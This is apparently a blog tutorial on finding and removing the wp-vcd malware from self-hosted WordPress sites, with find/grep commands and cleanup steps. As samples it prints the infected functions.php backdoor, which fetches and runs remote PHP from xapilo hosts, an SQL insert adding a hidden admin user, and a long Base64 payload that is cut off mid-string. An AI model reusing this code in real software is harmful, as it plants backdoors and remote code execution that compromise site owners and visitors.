DIY Removing the wp-vcd Malware From Self-Hosted WordPress Sites
Want to learn how to remove common malware from your (self-hosted) WordPress CMS?
Using and working with WordPress since 2007, I have been toiling several dozen websites, doing some development, and lots of tinkering. As WordPress is extremely an open-system since it is open-source, one of the frequently encountered issues doing such work is malware passed on from various resources, or from freelancers doing the work for you, but perhaps lacking certain meticulousness so as to unknowingly cause to bring in an infection your project in an honest mistake. It’s a familiar story and it usually goes like this: You hire someone, have them do some customization on your WordPress project – maybe even some development, and then everything seems just fine, but after sometime, your WordPress site starts acting up, taking up more system resources than it should, sometimes crashing with internal server 500 errors, or displaying any kind of misbehavior, and then you might even blame the hosting for it. It’s the question you secretly dread: The code had been already checked and optimized, and every website (or web application) security precaution had been taken, right? What could be wrong then? Well, here’s the bad news: Maybe your hosting / cloud service ISP’s malware scan was not as thorough as they boasted. Perhaps your WordPress site (or application) has been silently infected with malware. Could it be wp-vcd-positive?! :0
What is wp-vcd / wp-temp.php Malware?
Table of Contents
Manuel D’Orso (CirKu17 @ INTJ) published an article on Medium titled Wp-vcd Malware Analysis describing what it is and how it works.
Sometimes encountered in a file named wp-vcd.php or wp-tmp.php, the master objective of this particular malware is adding a secret admin user to the backend of WordPress sites. According to Bleeping Computer, attackers use this backdoor account to open connections to infected websites so attackers can carry out scripted attacks at later dates.
How to check if your WordPress installation has WP-VCD malware
Performing a WordPress Malware Scan with a PlugIn
If you are not a “techie” person, you may want to go the easy way, and use a ready-made software to scan your site. There is a popular plugin called ‘Wordfence’ with both a free light version, and a premium version. Luckily the feature scanning for malware appears to be enabled in the free version although – in my case – the scan fell to timeout after 5 to 10 minutes of starting it.
Scanning WP-VCD Malware Manually to Check if Your WordPress is Infected
If you do not prefer to use a plugin which could put additional burden on your server’s resources, and prefer to do it manually, here is my walkthrough. If you have basic UNIX/Linux skills, I’ll walk you through the whole process starting with a command-line terminal.
First off, open a terminal session in an SSH shell. If you are on a Mac or a Linux/UNIX machine, just fire up a Terminal window and SSH to your server. On Windows, you can use a free application such as PuTTy, or better yet, installing and using GitBash is my preferred way of running UNIX/Linux commands when I’m on Windows.
Either way, the next step is to check if there are any of the most typical files created by wp-vcd malware lurking about in the file system.
Now, while in Terminal, change directory to the root of your WordPress installation i.e. cd /path/to/your-wordpress and execute the following command:
find . -type f \( -name "wp-vcd.php" -o -name "wp-tmp.php" -o -name "class.theme-modules.php" -o -name "class.plugin-modules.php" \)
This searches for the presence of the following files in the file system where WordPress is installed:
- wp-vcd.php
- wp-tmp.php
- class.theme-modules.php
- class.plugin-modules.php
Believe it or not, the above files are not meant to be present in a standard WordPress configuration, and after running the above search command, if anything is found, the results will be listed line by line with pathnames relative to your current directory. No results means that there are no files created by the wp-vcd malware.
As the next step, it is not a bad idea to remove these files immediately by running a remove command rm proceeded with the pathname to file which you can simply copy and paste from the search results in the Terminal window, but as long as the infection exists, and you don’t get to the source of the problem, these files could and most probably will be re-created after the next HTTP request hits the web server to run a WordPress page (more precisely post.php) which is also likely to be already infected. Bear with me, because I’m going to show you how this malware works, and what actions are needed to followed to get rid of the malware.
How to Determine Which Code Files Spreading the Malicious Code
The simplest and most straightforward way to determine what part of the PHP code is creating these malicious files is to quickly search for specific chunks of text within all PHP files, so that you will know what you are up against.
How the WP-VCD Malware Works
If the source of the malware is a WordPress theme, the starting point of the malicious code is the functions.php file of the theme itself. This does not necessarily mean, it was that very theme in the first place which brought on the malware, but once any of your WordPress files are infected anyhow from whatever add-on that was installed, the active theme’s functions.php is usually one of the first places the virus gets to while spreading throughout multiple WordPress directories.
Once a theme containing the malicious code is activated, some of your WordPress core files become infected. Needless to say, the wp-includes folder will be the next crime scene toward that end. This is where at least wp-vcd.php and/or wp-tmp.php will be bred. To make matters worse, some malicious code will be injected to post.php in wp-includes which is a core standard WordPress file at the heart of every WP blog.
To find out which files are infected so as to create any of the four aforementioned malicious files, you can go back to the Terminal and at a parent directory containing all WordPress files, run a grep command like the following which will search within the code of all PHP files underneath if any of the four of the essential malware files are referred to:
grep -r --include=*.php -e "class.plugin-modules.php" -e "class.theme-modules.php" -e "wp-vcd.php" -e "wp-tmp.php" .
If there is no infection, the command will return nothing, otherwise it will list all the filenames with pathnames plus the code snippet following the filename after a colon.
Typically there will be a code block like the following in infected plugins:
<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?>
Malicious code containing the encoded strings gets injected into the functions.php file of a WordPress theme or plugin (and then all of them as it spreads), and it begins by resetting the modification date and time in order to make it less susceptible of the infection.then it populates remotely a database/array of hostnames and passwords of the code injections via o.php and downloads the content of a remote txt file inside class.wp.php. And in the infected WordPress themes, the following code block is added to the beginning of the functions.php code of the theme itself:
The file class.theme-modules.php (or class.plugin-modules.php in the case of infected or infectitous plugins) is one of the four files mentioned at the beginning of the text, that will then be included by the code added in functions.php. The encrypted malicious code in it installs the wp-vcd malware into the theme and creates the rest of the malicious files.
How to Remove the wp-vcd Malware
Although there is more than way of getting rid of this malware, since neither the Wordfence plugin nor the Avast anti-virus for Mac did not succeed in detecting any of the wp-vcd.php, wp-temp.php, class.theme-modules.php and class.plugin-modules.php in my case, deleting this foursome manually, and removing rest of the malicious code from post.php and functions.php files – not necessarily in this order, so keep reading – was one fool-proof way in my experiment with disinfecting the WordPress installation(s) from such an infection.
Removing WP-VCD Manually
If you have thoroughly read the above, you already know which files are sure to be deleted, but unless we remove the code which is enlisting them first, they will be created back in no time.
So as a first step, find which post.php and functions.php files do contain the malicious code, and then delete (or comment out if you prefer to analyze them further) that code. To be more specific, what needs to be removed from functions.php if it is infected is right below:
A typical functions.php from a simple WordPress theme before it was infected:
<?php if (function_exists('register_sidebar') ) register_sidebars(2, array( )); ?>
functions.php after getting infected with the malware:
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'e863f71d53726a93f47d5c4e141b927a')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='11222848a10f1d0ea555bcdf773f3eb4'; if (($tmpcontent = @file_get_contents("http://www.xapilo.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.xapilo.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.xapilo.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.xapilo.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?> <?php if (function_exists('register_sidebar') ) register_sidebars(2, array( )); ?>
To remove the malicious part of the code, delete lines from 1 to 166 in the above example.
Then remove only the following from post.php in wp-includes folder/directory:
<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>
or replace post.php with the same one from a clean WordPress installation: /wp-includes/post.php
Other files which might be infected by wp-vcd
class.wp.php
The class.wp.php which is normally a standard core WordPress file in wp-includes will ultimately try to inject a user for future attackers inside the WordPress database by executing a code like:
$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '100010010');");
In my experiment, this file never got infected, as it neither had such a code as the above, nor a diffcheck with a clean and original WordPress counterpart showed anything, but if you detect any malware infection, it is a very good idea to replace the entire wp-includes folder with a clean one from a fresh WordPress download – make sure versions do match, though.
Finally delete all instances of the files wp-vcd.php, wp-temp.php, class.theme-modules.php and class.plugin-modules.php which might have spread across your WordPress installations.
From a command-line Terminal, after going to the parent directory containing all your WordPress files and sub-directories, you can use the following command – all in one line – to seek and destroy all four of the malicious files with one shot:
find . -type f \( -name "wp-vcd.php" -o -name "wp-tmp.php" -o -name "class.theme-modules.php" -o -name "class.plugin-modules.php" \) -delete
Appendix [Example Malware Code]
Typical example of code found in class.theme-modules.php:
The class.theme-modules.php file typically consisting of the code below, holds a large block of Base64-encoded text, which is not difficult to spot when its source code is examined.
<?php //install_code1 error_reporting(0); ini_set('display_errors', 0); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); $GLOBALS['WP_CD_CODE'] = 'PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwppbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsIDApOwoKCSRpbnN0YWxsX2NvZGUgPSAnUEQ5d2FIQUthV1lnS0dsemMyVjBLQ1JmVWtWUlZVVlRWRnNuWVdOMGFXOXVKMTBwSUNZbUlHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTa2dKaVlnS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTQTlQU0FuZXlSUVFWTlRWMDlTUkgwbktTa0tDWHNLSkdScGRsOWpiMlJsWDI1aGJXVTlJbmR3WDNaalpDSTdDZ2tKYzNkcGRHTm9JQ2drWDFKRlVWVkZVMVJiSjJGamRHbHZiaWRkS1FvSkNRbDdDZ29KQ1FrSkNnb0tDZ29KQ1FrSlkyRnpaU0FuWTJoaGJtZGxYMlJ2YldGcGJpYzdDZ2tKQ1FrSmFXWWdLR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ibVYzWkc5dFlXbHVKMTBwS1FvSkNRa0pDUWw3Q2drSkNRa0pDUWtLQ1FrSkNRa0pDV2xtSUNnaFpXMXdkSGtvSkY5U1JWRlZSVk5VV3lkdVpYZGtiMjFoYVc0blhTa3BDZ2tKQ1FrSkNRa0pld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppQW9KR1pwYkdVZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9YMTlHU1V4RlgxOHBLUW9KQ1NBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lvY0hKbFoxOXRZWFJqYUY5aGJHd29KeTljSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITmNLQ0pvZEhSd09sd3ZYQzhvTGlvcFhDOWpiMlJsWEM1d2FIQXZhU2NzSkdacGJHVXNKRzFoZEdOb2IyeGtaRzl0WVdsdUtTa0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLQ2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1JtYVd4bElEMGdjSEpsWjE5eVpYQnNZV05sS0Njdkp5NGtiV0YwWTJodmJHUmtiMjFoYVc1Yk1WMWJNRjB1Snk5cEp5d2tYMUpGVVZWRlUxUmJKMjVsZDJSdmJXRnBiaWRkTENBa1ptbHNaU2s3Q2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeXdnSkdacGJHVXBPd29KQ1FrSkNRa0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQWlkSEoxWlNJN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQjlDZ29LQ1FrZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLQ1FrSkNRa0pDUWw5Q2drSkNRa0pDWDBLQ1FrSkNXSnlaV0ZyT3dvS0NRa0pDUWtKQ1FsallYTmxJQ2RqYUdGdVoyVmZZMjlrWlNjN0Nna0pDUWtKYVdZZ0tHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmJtVjNZMjlrWlNkZEtTa0tDUWtKQ1FrSmV3b0pDUWtKQ1FrSkNna0pDUWtKQ1FscFppQW9JV1Z0Y0hSNUtDUmZVa1ZSVlVWVFZGc25ibVYzWTI5a1pTZGRLU2tLQ1FrSkNRa0pDUWw3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHbG1JQ2drWm1sc1pTQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeWtwQ2drSklDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlod2NtVm5YMjFoZEdOb1gyRnNiQ2duTDF3dlhDOWNKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQ2hiWEhOY1UxMHFLVnd2WEM5Y0pHVnVaRjkzY0Y5MGFHVnRaVjkwYlhBdmFTY3NKR1pwYkdVc0pHMWhkR05vYjJ4a1kyOWtaU2twQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCN0Nnb0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa1ptbHNaU0E5SUhOMGNsOXlaWEJzWVdObEtDUnRZWFJqYUc5c1pHTnZaR1ZiTVYxYk1GMHNJSE4wY21sd2MyeGhjMmhsY3lna1gxSkZVVlZGVTFSYkoyNWxkMk52WkdVblhTa3NJQ1JtYVd4bEtUc0tDUWtKSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektGOWZSa2xNUlY5ZkxDQWtabWxzWlNrN0Nna0pDUWtKQ1FrSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIQnlhVzUwSUNKMGNuVmxJanNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0Nnb0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0pDUWtKQ1FrSkNYMEtDUWtKQ1FrSmZRb0pDUWtKWW5KbFlXczdDZ2tKQ1FrS0NRa0pDV1JsWm1GMWJIUTZJSEJ5YVc1MElDSkZVbEpQVWw5WFVGOUJRMVJKVDA0Z1YxQmZWbDlEUkNCWFVGOURSQ0k3Q2drSkNYMEtDUWtKQ2drSlpHbGxLQ0lpS1RzS0NYMEtDZ29LQ2dvS0Nnb2taR2wyWDJOdlpHVmZibUZ0WlNBOUlDSjNjRjkyWTJRaU93b2tablZ1WTJacGJHVWdJQ0FnSUNBOUlGOWZSa2xNUlY5Zk93cHBaaWdoWm5WdVkzUnBiMjVmWlhocGMzUnpLQ2QwYUdWdFpWOTBaVzF3WDNObGRIVndKeWtwSUhzS0lDQWdJQ1J3WVhSb0lEMGdKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkSUM0Z0pGOVRSVkpXUlZKYlVrVlJWVVZUVkY5VlVrbGRPd29nSUNBZ2FXWWdLSE4wY21sd2IzTW9KRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwc0lDZDNjQzFqY205dUxuQm9jQ2NwSUQwOUlHWmhiSE5sSUNZbUlITjBjbWx3YjNNb0pGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTBzSUNkNGJXeHljR011Y0dod0p5a2dQVDBnWm1Gc2MyVXBJSHNLSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0JtZFc1amRHbHZiaUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjMTkwWTNWeWJDZ2tkWEpzS1FvZ0lDQWdJQ0FnSUhzS0lDQWdJQ0FnSUNBZ0lDQWdKR05vSUQwZ1kzVnliRjlwYm1sMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUdOMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlCVlZSUFVrVkdSVkpGVWl3Z1ZGSlZSU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHTjFjbXhmYzJWMGIzQjBLQ1JqYUN3Z1ExVlNURTlRVkY5SVJVRkVSVklzSURBcE93b2dJQ0FnSUNBZ0lDQWdJQ0JqZFhKc1gzTmxkRzl3ZENna1kyZ3NJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPd29nSUNBZ0lDQWdJQ0FnSUNCamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmVlZKTUxDQWtkWEpzS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZM1Z5YkY5elpYUnZjSFFvSkdOb0xDQkRWVkpNVDFCVVgwWlBURXhQVjB4UFEwRlVTVTlPTENCVVVsVkZLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0pHUmhkR0VnUFNCamRYSnNYMlY0WldNb0pHTm9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ1kzVnliRjlqYkc5elpTZ2tZMmdwT3dvZ0lDQWdJQ0FnSUNBZ0lDQnlaWFIxY200Z0pHUmhkR0U3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUdaMWJtTjBhVzl1SUhSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhCb2NFTnZaR1VwQ2lBZ0lDQWdJQ0FnZXdvZ0lDQWdJQ0FnSUNBZ0lDQWtkRzF3Wm01aGJXVWdQU0IwWlcxd2JtRnRLSE41YzE5blpYUmZkR1Z0Y0Y5a2FYSW9LU3dnSW5Sb1pXMWxYM1JsYlhCZmMyVjBkWEFpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdKR2hoYm1Sc1pTQWdJRDBnWm05d1pXNG9KSFJ0Y0dadVlXMWxMQ0FpZHlzaUtUc0tJQ0FnSUNBZ0lDQWdJQ0JwWmlnZ1puZHlhWFJsS0NSb1lXNWtiR1VzSUNJOFAzQm9jRnh1SWlBdUlDUndhSEJEYjJSbEtTa0tDUWtnSUNCN0Nna0pJQ0FnZlFvSkNRbGxiSE5sQ2drSkNYc0tDUWtKSkhSdGNHWnVZVzFsSUQwZ2RHVnRjRzVoYlNnbkxpOG5MQ0FpZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ0lwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWthR0Z1Wkd4bElDQWdQU0JtYjNCbGJpZ2tkRzF3Wm01aGJXVXNJQ0ozS3lJcE93b0pDUWxtZDNKcGRHVW9KR2hoYm1Sc1pTd2dJancvY0dod1hHNGlJQzRnSkhCb2NFTnZaR1VwT3dvSkNRbDlDZ2tKQ1daamJHOXpaU2drYUdGdVpHeGxLVHNLSUNBZ0lDQWdJQ0FnSUNBZ2FXNWpiSFZrWlNBa2RHMXdabTVoYldVN0NpQWdJQ0FnSUNBZ0lDQWdJSFZ1YkdsdWF5Z2tkRzF3Wm01aGJXVXBPd29nSUNBZ0lDQWdJQ0FnSUNCeVpYUjFjbTRnWjJWMFgyUmxabWx1WldSZmRtRnljeWdwT3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBS0NpUjNjRjloZFhSb1gydGxlVDBuTVRFeU1qSTRORGhoTVRCbU1XUXdaV0UxTlRWaVkyUm1OemN6WmpObFlqUW5Pd29nSUNBZ0lDQWdJR2xtSUNnb0pIUnRjR052Ym5SbGJuUWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW1oMGRIQTZMeTkzZDNjdWRXRndhV3h2TG1OdmJTOWpiMlJsTG5Cb2NDSXBJRTlTSUNSMGJYQmpiMjUwWlc1MElEMGdRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpYM1JqZFhKc0tDSm9kSFJ3T2k4dmQzZDNMblZoY0dsc2J5NWpiMjB2WTI5a1pTNXdhSEFpS1NrZ1FVNUVJSE4wY21sd2IzTW9KSFJ0Y0dOdmJuUmxiblFzSUNSM2NGOWhkWFJvWDJ0bGVTa2dJVDA5SUdaaGJITmxLU0I3Q2dvZ0lDQWdJQ0FnSUNBZ0lDQnBaaUFvYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWNGRISmhZM1FvZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ2drZEcxd1kyOXVkR1Z1ZENrcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektFRkNVMUJCVkVnZ0xpQW5kM0F0YVc1amJIVmtaWE12ZDNBdGRHMXdMbkJvY0Njc0lDUjBiWEJqYjI1MFpXNTBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbktTa2dld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUVCbWFXeGxYM0IxZEY5amIyNTBaVzUwY3loblpYUmZkR1Z0Y0d4aGRHVmZaR2x5WldOMGIzSjVLQ2tnTGlBbkwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aG5aWFJmZEdWdGNHeGhkR1ZmWkdseVpXTjBiM0o1S0NrZ0xpQW5MM2R3TFhSdGNDNXdhSEFuS1NrZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNa